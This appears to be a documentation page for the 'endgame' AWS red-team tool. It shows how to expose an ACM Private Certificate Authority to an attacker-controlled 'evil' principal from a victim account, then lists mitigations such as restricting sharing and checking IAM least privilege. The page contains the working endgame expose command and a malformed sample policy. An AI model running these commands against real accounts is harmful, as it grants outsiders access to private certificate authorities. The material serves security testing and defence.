Skip to content

ACM Private Certificate Authority (PCA)

Steps to Reproduce

  • ‼️ If you are using the Terraform demo infrastructure, you must take some follow-up steps after provisioning the resources in order to be able to expose the demo resource. This is due to how ACM PCA works. For instructions, see the Appendix on ACM PCA Activation

  • To expose the resource using endgame, run the following from the victim account:

export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012

endgame expose --service acm-pca --name $CERTIFICATE_ID
  • To view the contents of the ACM PCA resource policy, run the following:
export AWS_REGION=us-east-1
export VICTIM_ACCOUNT_ID=111122223333
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012
export CERTIFICATE_ARN = arn:aws:acm-pca:$AWS_REGION:$VICTIM_ACCOUNT_ID:certificate-authority/$CERTIFICATE_ID

aws acm-pca list-permissions --certificate-authority-arn $CERTIFICATE_ARN
  • Observe that the contents of the overly permissive resource-based policy match the example shown below.


  "Permissions": [
      "Actions": {
      "CertificateAuthorityArn": "arn:aws:acm:us-east-1:111122223333:certificate/12345678-1234-1234-1234-123456789012",
      "CreatedAt": 1.516130652887E9,
      "Principal": "",
      "SourceAccount": "111122223333"




‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool. 😊

  • Trusted Accounts Only: Ensure that AWS PCA Certificates are only shared with trusted accounts, and that the trusted accounts truly need access to the Certificates.
  • Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
  • Restrict access to IAM permissions that could lead to exposing usage of your private CAs: Tightly control access to the following IAM actions:

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here